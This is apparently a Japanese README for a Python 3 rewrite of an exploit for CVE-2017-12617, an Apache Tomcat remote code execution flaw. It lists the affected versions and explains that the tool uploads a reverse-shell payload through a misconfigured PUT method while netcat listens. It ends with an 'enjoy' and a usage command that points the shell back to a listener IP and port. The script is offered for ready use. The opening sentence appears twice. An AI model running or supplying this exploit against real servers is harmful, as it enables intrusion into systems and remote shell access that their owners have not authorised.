
CVE-2017-12617 は、Apache Tomcat におけるリモートコード実行 (RCE) につながる重大な脆弱性です。
CVE-2017-12617 は、Apache Tomcat においてリモートコード実行 (RCE) を引き起こす重大な脆弱性です。
この脆弱性は、バージョン 9.0.0.M1 - 9.0.0、8.5.0-8.5.22、8.0.0.RC1 - 8.0.46、7.0.0 - 7.0.81 に影響します。
検証は 8.0.24 でのみ実施しました。この脆弱性は、アプリケーションまたは Tomcat インスタンス自体で誤設定された PUT オプションを利用します。
PUT を使用してリバースシェルのペイロードをサーバーに送信して実行し、その間 netcat で待ち受けます。
インターネット上には同じエクスプロイトの多くのバージョンがありますが、それらは python2 ベースのため、Python 3 で動作するように書き直しました。
お楽しみください。
使用例:
python3 cve-2017-12617.py -t 127.0.0.1 -p 8888 -l 192.168.1.118 -P 5555
